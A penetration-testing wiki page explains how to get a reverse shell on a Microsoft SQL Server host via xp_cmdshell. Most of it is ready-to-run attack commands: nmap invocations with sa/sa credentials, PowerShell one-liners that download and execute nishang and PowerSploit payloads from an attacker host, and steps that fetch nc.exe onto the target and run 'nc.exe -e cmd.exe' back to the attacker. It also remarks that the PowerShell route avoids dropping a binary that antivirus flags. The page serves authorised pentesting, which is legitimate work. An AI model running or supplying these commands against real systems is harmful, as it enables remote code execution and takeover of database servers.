How to get an xp_cmdshell reverse shell

Penetration Testing Wiki

xp_cmdshell reverse shell

In a penetration testing engagement, once you hold credentials for a Microsoft SQL Server login with the sysadmin role (the sa account in the examples below), you can execute operating-system commands on the database host through the xp_cmdshell extended stored procedure. The nmap NSE script ms-sql-xp-cmdshell wraps the whole thing in one command:

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="whoami" $IP

Two caveats: xp_cmdshell is disabled by default, so if the script reports it as disabled you first have to enable it with sp_configure (which again requires sysadmin); and the command runs as the Windows account the SQL Server service runs under, not as the SQL login, so the whoami output tells you what you actually have on the box.

You have to substitute the following parameters of the above command:

  • mssql.username
  • mssql.password
  • ms-sql-xp-cmdshell.cmd
  • $IP (the target database server)

If you want a reverse shell that connects back to your machine, pass a one-liner from one of the Windows PowerShell post-exploitation frameworks as the ms-sql-xp-cmdshell.cmd value. In the one-liners below, $IP is your attacking machine: it has to serve the script over HTTP and run a listener on the chosen port before the command is fired.

xp_cmdshell with nishang

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"

xp_cmdshell with Powersploit

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $IP -Lport 4444 -Force"

Here $IP is again your attacking machine, serving the PowerSploit tree on port 8000 and running a Metasploit multi/handler with PAYLOAD windows/meterpreter/reverse_https on port 4444. Note that newer PowerSploit releases removed the built-in -Payload option from Invoke-Shellcode; with those you generate the shellcode with msfvenom and hand it over through the -Shellcode parameter instead.

xp_cmdshell with nc

First we need to download nc.exe to the target machine (192.168.1.10) from our machine (192.168.1.3). Serve the binary over HTTP on our side first (for example with python3 -m http.server 80 from the directory that holds nc.exe); PowerShell's wget alias is Invoke-WebRequest, which fetches it. The backslashes in the destination path are doubled so that they survive nmap's --script-args parsing:

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="powershell.exe wget http://192.168.1.3/nc.exe -OutFile C:\\Users\\Public\\nc.exe" 192.168.1.10

Now start a listener on our machine (nc -lvnp 4444) and execute the reverse shell:

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="C:\\Users\\Public\\nc.exe -e cmd.exe 192.168.1.3 4444" 192.168.1.10

Keep in mind that nc.exe is flagged by Windows Defender and most antivirus engines, so on a protected host it is likely to be quarantined as soon as it lands; the PowerShell one-liners above at least avoid writing a known-bad binary to disk. Also, xp_cmdshell waits for the command to finish, so the nmap run will not return while the shell is connected; that is expected.

More info in the following sections:

SQL Exploitation section
Powershell frameworks for Post-exploitation
